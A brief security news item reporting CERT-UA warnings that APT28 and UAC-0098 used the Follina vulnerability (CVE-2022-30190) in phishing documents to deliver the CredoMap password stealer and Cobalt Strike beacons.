The Ukrainian CERT is warning that russian hacking groups are exploiting the Follina code execution vulnerability in new phishing campaigns to install the CredoMap malware and Cobalt Strike beacons. This APT28,targeting users with malware that steals credentials stored in browsers.
The APT28 hacking organization is suspected of sending emails with the attachment “Nuclear Terrorism A Very Real Threat.rtf.” The threat actors chose the subject of this email to attract users to open it, capitalizing on the widespread fear of a nuclear strike among Ukrainians.
The CERT-UA has identified a different campaign by a threat actor tracked as UAC-0098,also using CVE-2022-30190 to infect the target with minimal interaction.
The RFT document used in the APT28 campaign attempts to exploit CVE-2022-30190,to download and launch CredoMap malware on a target’s device.
Know about CredoMap
CredoMap is an unknown malware strain many AV engines have spotted on Virus Total, and several vendors have classified it as a password-stealing Trojan.
The malware seeks to steal information such as account passwords and cookies from Chrome, Edge, and Firefox web browsers. Finally, the malware uses the IMAP email protocol to exfiltrate the stolen data, transferring everything to the C2 address, which is housed on an abandoned Dubai-based website.
CERT-UA warned about Russian hackers from the Sandworm group exploiting CVE-2022-30190. However, the threat actors behind the attacks have been recognized as the APT28 gang this time.
In this case, CERT-UA says the threat actor uses a DOCX file named “Imposition of penalties.docx”, and the payload fetched from a remote resource is a Cobalt Strike beacon with a recent compilation date.